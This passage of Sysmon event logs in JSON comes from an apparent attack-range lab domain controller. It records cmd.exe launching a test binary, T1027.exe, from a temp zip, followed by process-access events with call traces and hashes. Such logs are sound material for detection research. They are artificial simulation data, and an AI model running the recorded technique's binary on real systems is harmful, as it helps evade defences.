MD5=6C95FC4CECC9B0C6CBFC91AF865E6E65,SHA256=C692890297B609BA19E95D7A9127E63299250A6338F1645EAE576BE67F03B8BE,IMPHASH=AFCDF79BE1557326C854B6E20CB900A7\r\nParentProcessGuid: {A837DB8D-032D-5F25-0000-0010DB480A00}\r\nParentProcessId: 3808\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"\"%temp%\\temp_T1027.zip\\T1027.exe\"\" ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.440","ProcessGuid":"{A837DB8D-032D-5F25-0000-0010A2490A00}","Image":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe\"  ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=6C95FC4CECC9B0C6CBFC91AF865E6E65,SHA256=C692890297B609BA19E95D7A9127E63299250A6338F1645EAE576BE67F03B8BE,IMPHASH=AFCDF79BE1557326C854B6E20CB900A7","ParentProcessGuid":"{A837DB8D-032D-5F25-0000-0010DB480A00}","ParentProcessId":"3808","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"\"%temp%\\temp_T1027.zip\\T1027.exe\"\" ","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5308,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.437\r\nSourceProcessGUID: {A837DB8D-032D-5F25-0000-0010DB480A00}\r\nSourceProcessId: 3808\r\nSourceThreadId: 4408\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010A2490A00}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.437","SourceProcessGUID":"{A837DB8D-032D-5F25-0000-0010DB480A00}","SourceProcessId":"3808","SourceThreadId":"4408","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010A2490A00}","TargetProcessId":"3288","TargetImage":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5309,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.437\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.437","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5310,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.437\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.437","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5311,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.437\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.437","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5312,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.437\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.437","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5313,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.437\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.437","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5314,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.437\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.437","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5315,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.437\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 